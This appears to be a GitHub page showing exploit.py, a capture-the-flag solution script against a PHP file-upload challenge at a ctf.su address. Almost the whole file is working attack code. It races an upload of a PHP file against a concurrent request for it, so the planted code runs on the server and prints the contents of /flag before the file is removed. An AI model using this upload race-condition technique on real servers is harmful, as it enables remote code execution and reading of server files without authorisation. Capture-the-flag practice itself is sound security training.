-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
36 lines (28 loc) · 1.21 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import requests
from concurrent.futures import ThreadPoolExecutor
UPLOAD_URL = "https://2019-11-17-angry.ctf.su/"
READ_URL = "https://2019-11-17-angry.ctf.su/uploads/{filename}"
def upload_file(filename: str, file_content: str):
files = {"upFile": (filename, file_content)}
data = {"submit": "Upload"}
response = requests.post(UPLOAD_URL, files=files, data=data)
return response.status_code == 200
def read_file(filename: str):
response = requests.get(READ_URL.format(filename=filename))
if response.status_code == 200:
return response.text
return None
def race_condition(filename: str, file_content: str):
with ThreadPoolExecutor(max_workers=2) as executor:
upload_future = executor.submit(upload_file, filename, file_content)
read_future = executor.submit(read_file, filename)
upload_success = upload_future.result()
file_contents = read_future.result()
return upload_success, file_contents
filename = "exploit.php"
file_content = "<?php echo file_get_contents('/flag'); ?> " * 10**5
for attempt in range(10):
upload_success, file_contents = race_condition(filename, file_content)
if file_contents:
print(file_contents)
break